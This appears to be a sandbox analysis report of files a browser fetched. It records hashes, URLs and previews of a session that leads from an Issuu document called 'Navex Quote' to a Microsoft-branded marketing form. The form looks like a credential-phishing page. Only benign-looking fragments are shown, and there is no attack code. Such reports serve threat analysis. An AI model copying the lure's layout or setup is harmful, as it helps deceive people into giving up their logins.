                                                                                                          Preview:/** @license React v17.0.2. * react.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function(){'use strict';(function(c,x){"object"===typeof exports&&"undefined"!==typeof module?x(exports):"function"===typeof define&&define.amd?define(["exports"],x):(c=c||self,x(c.React={}))})(this,function(c){function x(a){if(null===a||"object"!==typeof a)return null;a=Y&&a[Y]||a["@@iterator"];return"function"===typeof a?a:null}function y(a){for(var b="https://reactjs.org/docs/error-decoder.html?invariant="+a,e=1;e<arguments.length;e++)b+="&args[]="+encodeURIComponent(arguments[e]);return"Minified React error #"+.a+"; visit "+b+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}function v(a,b,e){this.props=a;this.context=b;this.refs=Z;this.updater=e||aa}function ba(){}function K(a,b,e
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3317)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):7095
                                                                                                          Entropy (8bit):5.394934098797716
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:r/3K0kTEWqOAOiQ4nnb2gWYY4XpNFCpyK0Lzz5QLXN4mBC3pciof8:r/3K0kTEW5AOiQ4nnb2gWYY4XpNFCpyV
                                                                                                          MD5:0B525B4BF83174F15AB26EE4F8FCBB0D
                                                                                                          SHA1:78DA3B2ACD703C330AB27D0917A0163BE20E8FFB
                                                                                                          SHA-256:971C4B6AFED91001C8DDEF98CCCD56E11F55B20A89EA33C5AC006888869E4459
                                                                                                          SHA-512:058E6BB582BDD880753ADFA9E618391CC6FAEF2AE4F3B86753514B07CF55D32679F2C2FB05F325FD899230FDCAE2F914045AE145D4AA16B1B03861C5335C2DAA
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQ
                                                                                                          Preview:<!DOCTYPE html><html lang="en" prefix="og: http://ogp.me/ns#"><head><meta content="on" http-equiv="x-dns-prefetch-control" data-reactroot=""/><link href="e.issuu.com" rel="dns-prefetch" data-reactroot=""/><link href="image.isu.pub" rel="dns-prefetch" data-reactroot=""/><link href="layers.isu.pub" rel="dns-prefetch" data-reactroot=""/><link href="issuu.com" rel="dns-prefetch" data-reactroot=""/><link href="photo.isu.pub" rel="dns-prefetch" data-reactroot=""/><link href="pingback.issuu.com" rel="dns-prefetch" data-reactroot=""/><link href="reader3.isu.pub" rel="dns-prefetch" data-reactroot=""/><link href="static.isu.pub" rel="dns-prefetch" data-reactroot=""/><link href="in-pub-video.isu.pub" rel="dns-prefetch" data-reactroot=""/><title data-reactroot="">Navex Quote #65169. by txbct.com - Issuu</title><meta content="online magazines, digital magazines, digital magazine software, interactive magazines, digital magazine platform, create digital magazine, create digital publication, digital
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):119
                                                                                                          Entropy (8bit):4.4319879552066865
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:YWA16LclKmk/FxUJAu+JfF00QLVkrEIAHfF3BN6qVn:YWA5KV/gJAuke0QarW/RRn
                                                                                                          MD5:023A988D3445B435226F41A3F4D7D445
                                                                                                          SHA1:FBC48E6564A8C61DCFA673D011E01939E69F948A
                                                                                                          SHA-256:7F1BD558EABBFBD6518AC2C952BBB93929B9F4DFDC957C5503A62749E0E28532
                                                                                                          SHA-512:F37CE56431F36B691EC2D895360149FC21C5F37D2D05153A4ED736E66C39222876E669B3CC646BFA40142D3CD9DEF04ED7E69F53C33E849D21BA73A1A738D7A5
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://spidersense.bendingspoons.com/v1/public/setup/issuu_web?user_id=5932e7dc-5014-446b-8909-bfa725841c50&app_version=0
                                                                                                          Preview:{"send_next_batch_interval": 2.0, "rules": [{"name": "spooners", "value": true}, {"name": "standard", "value": false}]}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):31
                                                                                                          Entropy (8bit):3.86469832616696
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:YBAvZNQaY:YwZNQaY
                                                                                                          MD5:2D7D30EA1C6F925302D2C3ABED382951
                                                                                                          SHA1:5BA6BBC5670C4AF1125CF9AC0AA1CA2811E744D1
                                                                                                          SHA-256:83C09BA9A8DAEDB136F90B17A294CAA90AD471A016E430DF6E229ACB5A81E100
                                                                                                          SHA-512:BCC7AAA8A6A27ADCBD1B3E0FCA73FC1BD727FECEAB34734E99863503D1D50936A8830C0A12D75D187614F318F46B1E67F046E89F5EB6CE727D8433A722E2C525
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:{"detail":"Method Not Allowed"}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:gzip compressed data, was "page_1.bin", last modified: Tue Dec 24 19:30:36 2024, max compression, original size modulo 2^32 189219
                                                                                                          Category:dropped
                                                                                                          Size (bytes):83886
                                                                                                          Entropy (8bit):7.9962741781523485
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:J9z+6V3iy9xvu+LwgPkFU4yvM4T5ANNIihDDHsYVb1ay8XO:bi43T/OgBBM49AnDDHxb158XO
                                                                                                          MD5:7D31381EEDAC964C99F8BEB273DF1102
                                                                                                          SHA1:84676C9F489DBA92A4953FD58E8B0522260EC0C4
                                                                                                          SHA-256:B2D340A330E792D6C25213E04D1CF5B3AC9934F98FCB5CBDD15C0D04DA68905B
                                                                                                          SHA-512:213CAACBCF862E9D0BBA8DB8021F84DC1FD4A701F65C1A80D2CBFC8733E9523A138C1C24A47172564361FB61648D848FAA7083371DE74761407443F5F50B277C
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:......kg..page_1.bin...\.........!H...w......,..C.....=.....{...d..;wf~g.......d.U...8.4H<(.nv.0...w...p.0ha.85.$.a1.`..B$.....F$&.V.$f..$...6$.f.."]..H.m.I\..I.l.I.....$&..$...6...$....0.....*..F..._6.?.i.a"b..@.8.?qll.Bc.T.i..`*.ML..G.`DF.qDX.....H..j"/.."?F.E.$~"l.DR5.E...E@.."..".0m"/..EX..D.B.EX1.ER...iA"l.0@@.........|$...%.........!&Y.f!\@.C^ .....M.8.&...S._W..Ei.M....q$+ G..p.......L?......9...9a..H .o4p.=.8.....M..s&.3...'.3........ .|.p...y_..r..ZPU.y.j..W...&..x..H.Bc.A#P(........................V....MM....k".8.......pz.._...6 ....|N*b.. ...-2.%)..&..2.1-r.I...ag..a...&K$M.@..Y+....>...F....-..Z.a.../E...E...i..@v%$ .......8.M.4."...0.5...?I...N.z.0.....EU?..1...d..$@9...QYe%..QE..A.`..!...7!.s.?......Y..%rS(-UA.d/_85..l....J....a.......IH".........]"c.."cV.`..Sd..J$...h......G...l...s: .......8....t..S..l;...'e ......_.xx8p.................@..b.&B......./.}..@.sTf....u..S.........p_E.!......IpX..^.. .......9...._+[...m..D......P|
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65458)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):736941
                                                                                                          Entropy (8bit):5.552360512043352
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:yKrLrj8tGPqHIja/9VFo8ICGSqQi9VADb4ntGA:y84tGPqHIja/Zo8ICdi9VADsGA
                                                                                                          MD5:575F23E96B4C82690D1DC3D898BA7216
                                                                                                          SHA1:CFE22F373146BD921A62B340FF65DA7ECA12E62C
                                                                                                          SHA-256:26260593B014F2EACEA941A254052AF765C66FF8804CAE1EEFAB88CA5B1C20D8
                                                                                                          SHA-512:5D6D439BDA7142A9606EC51850685E292F529B3BCDD6896A0F49947A0F5E3D99100A6CE4BC9CFF6D9ADC8AD5F1AFE840AF28891D1B62C0070044ACC7B9D5CFEA
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://static.isu.pub/fe/frontend-reader3/8495b66a/shareable-fullscreen.js
                                                                                                          Preview:/*! For license information please see shareable-fullscreen.js.LICENSE.txt */.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="76c2606b-b60c-41a3-aa7b-68e55568b5d7",e._sentryDebugIdIdentifier="sentry-dbid-76c2606b-b60c-41a3-aa7b-68e55568b5d7")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"frontend-reader3@8495b66a"},(()=>{var __webpack_modules__={3896:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=class{constructor(){this.mutex=Promise.resolve()}async run(e){return new Promise(((t,r)=>{this.mutex=this.mutex.then((async()=>{try{t(await e())}catch(e){r(e)}}))}))}}},2202:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.isNotNullish=function(e){return null!=e},t.isNullis
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):907
                                                                                                          Entropy (8bit):4.477465974969914
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:tI/wX5AKCyJCvafIr5Sdj86o/IYVwUE7j90TuulNki2I/UsI/93:a/mCyJctSdjRoA9UIjKlNky8H9
                                                                                                          MD5:9269C84A186A84428C416DF1FF8749D9
                                                                                                          SHA1:6AFA63E72B3BDEAE49BE6917775D6C6EB29392C5
                                                                                                          SHA-256:14041F90346192138580F3AD85782E0254F8EFA1C66265C850606576C913CD82
                                                                                                          SHA-512:3A4C6471F30984D0F15B1F093BE274471EAC70BD1A3C0058BB12D7AD24D88090229D4A1177D6B4217501D5D081D679FF4BDBD4BBB042128345D952B8F6D5A941
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://issuu.com/icon.svg
                                                                                                          Preview:<svg. viewBox="0 0 24 24". xmlns="http://www.w3.org/2000/svg".>. <style>. @media (prefers-color-scheme: dark) {. .path { fill: #f26f61 }. }. </style>. <path. d="M11.844 6.05c-3.04-.015-5.52 2.454-5.535 5.52-.016 3.063 2.433 5.559 5.472 5.578 3.043.02 5.524-2.449 5.543-5.511.028-3.067-2.418-5.575-5.457-5.602m-.101 8.371a2.793 2.793 0 01-2.57-1.761 2.836 2.836 0 01.64-3.067 2.778 2.778 0 013.055-.57 2.82 2.82 0 011.691 2.629 2.797 2.797 0 01-2.816 2.77zm0 0". fill="#f26f61". />. <path. d="M11.715.727H1.789a.907.907 0 00-.902.91v10c0 6.023 4.847 10.91 10.828 10.91 5.98 0 10.828-4.887 10.828-10.91 0-6.024-4.848-10.91-10.828-10.91M4.28 11.484c.04-4.183 3.434-7.539 7.586-7.5 4.149.043 7.48 3.465 7.442 7.645-.04 4.18-3.438 7.539-7.586 7.5a7.49 7.49 0 01-5.293-2.27 7.571 7.571 0 01-2.149-5.375zm0 0". fill="#f26f61". />.</svg>.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4054
                                                                                                          Entropy (8bit):7.797012573497454
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
                                                                                                          MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                                                          SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                                                          SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                                                          SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (544)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11440
                                                                                                          Entropy (8bit):5.360613902337515
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:8cL60YrI90CW3j4xqLYfMHaPsiJcW9eYcfZcTQWhGJykDZNZ3e:9L6hrI90CW3jhgUiJc+eYcfZ3W0JySN0
                                                                                                          MD5:61699B70CF57ABE63FDF5F4007D36EC1
                                                                                                          SHA1:6C05189CC2D08BB2A7609C002F0675C9C670D362
                                                                                                          SHA-256:229BBF4D0E7488209564152C6723497F1AC3934136CA1684233D2FA88FA4146F
                                                                                                          SHA-512:AA5CC8794B5383B781A6611A4B5D8D660C73E766186551799B28FCF668C911EB0177FA04F543EC60E5F64005F3BCE019604BD0A2129D718F33284D3689F5C398
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/** @license React v17.0.2. * react.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function(){'use strict';(function(c,x){"object"===typeof exports&&"undefined"!==typeof module?x(exports):"function"===typeof define&&define.amd?define(["exports"],x):(c=c||self,x(c.React={}))})(this,function(c){function x(a){if(null===a||"object"!==typeof a)return null;a=Y&&a[Y]||a["@@iterator"];return"function"===typeof a?a:null}function y(a){for(var b="https://reactjs.org/docs/error-decoder.html?invariant="+a,e=1;e<arguments.length;e++)b+="&args[]="+encodeURIComponent(arguments[e]);return"Minified React error #"+.a+"; visit "+b+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}function v(a,b,e){this.props=a;this.context=b;this.refs=Z;this.updater=e||aa}function ba(){}function K(a,b,e
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):55758
                                                                                                          Entropy (8bit):4.636759141170509
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:aHwXGG6Gb/4MvS9cPjC4V+i6qaRLExbVbVODMWXK1kXQF9WV:aHq6E/4Ma9cPW4widOEDsDML1BE
                                                                                                          MD5:EA7A6390DF1040B71CDAF797C4F0B852
                                                                                                          SHA1:CD3C92B079C68831C69F866FEDC7FD331F17CDC9
                                                                                                          SHA-256:4D7B064B8753B3B52F440A84F97A76C6FAA3F7813A8AFD2A81F1C353D19EE413
                                                                                                          SHA-512:3DDD30F114979EBA544C3117E4874A3412197223EC7A4FE5CE02373633A0BF87379ABC26A863E64EF6B91D90375136C6CAA2B3E87B73883DD51AA3BC898AF14E
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:{"formRenderingStatus":0,"formHtml":"<!DOCTYPE html><html><head>\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n <link rel=\"shortcut icon\" href=\"https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico\">\n <title>Microsoft </title>\n <meta name=\"referrer\" content=\"never\">\n \n <meta type=\"xrm/designer/setting\" name=\"type\" value=\"marketing-designer-content-editor-document\">\n <meta type=\"xrm/designer/setting\" name=\"layout-editable\" value=\"marketing-designer-layout-editable\">\n <style data-merge-styles=\"true\">\n .hide-on-desktop-class {\n display: none !important;\n }\n @media only screen and (max-width: 768px) {\n .tbContainer {display: block !important;}\n a span {\n line-height: inherit !important;
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:gzip compressed data, original size modulo 2^32 155
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):162
                                                                                                          Entropy (8bit):6.621925542861166
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Ftty1kIQxu/lY47OJTpgmbQYpYL8puFkXEeKPM2fNYORZrlT9a/:XtLxuR7OsyQYl0eKPM2yORVfq
                                                                                                          MD5:B8FD3EDB18DBABC46500456060B24FBD
                                                                                                          SHA1:18A74F35E441E8B3514A095AEEE483A1828C8388
                                                                                                          SHA-256:7721360AA2770CD84410D063853ACD548C4855493ED8BBE6DADC539219254A80
                                                                                                          SHA-512:922B444A042F5179C29946E5746C33F871BBA4D91053142A35C5457B17F9402DE7023E03BE6888875B7B2044E07BADC208320BF7C16F9F6AF0F2D1684C937B00
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://assets.isu.pub/smartzoom/241224193034-77c097d7eadd36d5a1226b1a395fdd6b/v1/smartzoom.bin
                                                                                                          Preview:..........]...P...s.2.V..N.E8. ......`......0.,........L.D......L`,Q".h,.N....TxM.0.+4.#.......St./..P^y.o.tS..)2Qq*...vVn..}#<O...b...?..G..._~.p7.V....
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):122515
                                                                                                          Entropy (8bit):7.997419459076181
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:1L4xVJNv/cJPu5OEjvuUQIq40zDH227PURbj:1kbGugELatzL7PUlj
                                                                                                          MD5:AC9A6ED508328361A4C9530325A94076
                                                                                                          SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                                                                          SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                                                                          SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_kAx9qZOSH4g90FNHstHMCA2.js
                                                                                                          Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:MS Windows icon resource - 3 icons, 32x32, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):12846
                                                                                                          Entropy (8bit):4.288518520651105
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:na/YoUr4e5OqTI1jU+C4rH2Co+4Kwm3+mtu3bfDxphM+FII7Yis:a/2atC4rX4Kz3+mkrzhM1
                                                                                                          MD5:B6B44F066DD28661C0110ABBEE41AF69
                                                                                                          SHA1:5320B3EC3ABF15DE39E6B47AC72F46D43196D204
                                                                                                          SHA-256:03A41EBA82CF8E0DF3890D0F247EF9AC72A28FCFC264E1F104DDA587C2AA26B6
                                                                                                          SHA-512:1522B9FEF34E2F667C40547509FC8E292A3027B21CA18C93FFA407E4D5241725BFF029A0D9A017C6ECC4726A3EBEB002F704D38CA88A8FC58D303B1D1B9BD6B1
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://issuu.com/favicon.ico
                                                                                                          Preview:...... .... .....6... .... ......... .... ......!..(... ...@..... .....................................................................aq..`o..ao..ao..ao..ao..ao..ao..an..O]..]l..........................................................................`o..`o.._n..cV..`n..ao..bo..am. an..ao..ao..`m..cq..an..p...`j..........................................................Nd..an..ao.._n..ao.9ao.pao.ao..ao..ao..ao..ao..ao.ao.~`n.Ean..br..an.._m..`n..........................................]t..ca.._n..bo..`o.?ao.ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao.ao.Uao..bo..ef..ff..................................^r..]s..dl..ao..ao.ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao.ao.+[y..bk..ao..........................`j..\o..ck..bn.#ao.ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao..ao.Adv..]o..Uq......................`h..`s.._o.$ao.ao..ao..ao..ao..ao..ao..ao..ao.ao.ao.ao.ao.ao..ao..ao..ao..ao..ao..ao..ao..ao.?lm..Vq..ao..............cq..bo
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:gzip compressed data, was "page_1.bin", last modified: Tue Dec 24 19:30:36 2024, max compression, original size modulo 2^32 189219
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):83886
                                                                                                          Entropy (8bit):7.9962741781523485
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:J9z+6V3iy9xvu+LwgPkFU4yvM4T5ANNIihDDHsYVb1ay8XO:bi43T/OgBBM49AnDDHxb158XO
                                                                                                          MD5:7D31381EEDAC964C99F8BEB273DF1102
                                                                                                          SHA1:84676C9F489DBA92A4953FD58E8B0522260EC0C4
                                                                                                          SHA-256:B2D340A330E792D6C25213E04D1CF5B3AC9934F98FCB5CBDD15C0D04DA68905B
                                                                                                          SHA-512:213CAACBCF862E9D0BBA8DB8021F84DC1FD4A701F65C1A80D2CBFC8733E9523A138C1C24A47172564361FB61648D848FAA7083371DE74761407443F5F50B277C
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://layers.isu.pub/77c097d7eadd36d5a1226b1a395fdd6b/241224193034/v2/page_1.bin
                                                                                                          Preview:......kg..page_1.bin...\.........!H...w......,..C.....=.....{...d..;wf~g.......d.U...8.4H<(.nv.0...w...p.0ha.85.$.a1.`..B$.....F$&.V.$f..$...6$.f.."]..H.m.I\..I.l.I.....$&..$...6...$....0.....*..F..._6.?.i.a"b..@.8.?qll.Bc.T.i..`*.ML..G.`DF.qDX.....H..j"/.."?F.E.$~"l.DR5.E...E@.."..".0m"/..EX..D.B.EX1.ER...iA"l.0@@.........|$...%.........!&Y.f!\@.C^ .....M.8.&...S._W..Ei.M....q$+ G..p.......L?......9...9a..H .o4p.=.8.....M..s&.3...'.3........ .|.p...y_..r..ZPU.y.j..W...&..x..H.Bc.A#P(........................V....MM....k".8.......pz.._...6 ....|N*b.. ...-2.%)..&..2.1-r.I...ag..a...&K$M.@..Y+....>...F....-..Z.a.../E...E...i..@v%$ .......8.M.4."...0.5...?I...N.z.0.....EU?..1...d..$@9...QYe%..QE..A.`..!...7!.s.?......Y..%rS(-UA.d/_85..l....J....a.......IH".........]"c.."cV.`..Sd..J$...h......G...l...s: .......8....t..S..l;...'e ......_.xx8p.................@..b.&B......./.}..@.sTf....u..S.........p_E.!......IpX..^.. .......9...._+[...m..D......P|
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):548
                                                                                                          Entropy (8bit):4.660801881684815
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:TvgsoCVIogs01lI5r8INGlTF5TF5TF5TF5TF5TFK:cEQtnDTPTPTPTPTPTc
                                                                                                          MD5:4B074B0B59693FA9F94FB71B175FB187
                                                                                                          SHA1:0004D4F82B546013424B2E0DE084395071EEF98B
                                                                                                          SHA-256:25FB23868EBF48348F9E438E00CB9B9D9B3A054F32482A781C762CC4F9CC6393
                                                                                                          SHA-512:F928E9FAA0BC776FC5D8A0326981853709D437B7B1C2E238894BFB2ACBB627442C425CBB00D369C52D15876B6C795E67F7580341686696D569A908A6ADD4B444
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:<html>..<head><title>403 Forbidden</title></head>..<body>..<center><h1>403 Forbidden</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):15
                                                                                                          Entropy (8bit):3.189898095464287
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Uh1Kn:UDKn
                                                                                                          MD5:39A19D0882684989864FA50BCED6A2D1
                                                                                                          SHA1:5CED55DAC2E0427E9DC605CEC1FEDAB0949EB15E
                                                                                                          SHA-256:8FBEDED073249C3611742297EE96A976A95EE113F33B9A422A5D3A7A2DEB63E5
                                                                                                          SHA-512:E795CB7DE27B42948B7DDFF19F3B401A8F95753AC7D37D9B5F52D8DACD2AA43A2AD9EACEC29F77D28080E20C21C48B9FA88A733FAC108939FB2F0EB036C7AEEE
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://statics-marketingsites-eus-ms-com.akamaized.net/statics/override.css
                                                                                                          Preview:/* empty css */
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):548
                                                                                                          Entropy (8bit):4.688532577858027
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:TjeRHVIdtklI5r8INGlTF5TF5TF5TF5TF5TFK:neRH68DTPTPTPTPTPTc
                                                                                                          MD5:370E16C3B7DBA286CFF055F93B9A94D8
                                                                                                          SHA1:65F3537C3C798F7DA146C55AEF536F7B5D0CB943
                                                                                                          SHA-256:D465172175D35D493FB1633E237700022BD849FA123164790B168B8318ACB090
                                                                                                          SHA-512:75CD6A0AC7D6081D35140ABBEA018D1A2608DD936E2E21F61BF69E063F6FA16DD31C62392F5703D7A7C828EE3D4ECC838E73BFF029A98CED8986ACB5C8364966
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://assets-eur.mkt.dynamics.com/bundles/styles/site-oneui?v=8YWa2Ur5m3Cwsd0DiZglELVhzyhG6ISKq83ynhxVX7E1
                                                                                                          Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65458)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):736941
                                                                                                          Entropy (8bit):5.552360512043352
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:yKrLrj8tGPqHIja/9VFo8ICGSqQi9VADb4ntGA:y84tGPqHIja/Zo8ICdi9VADsGA
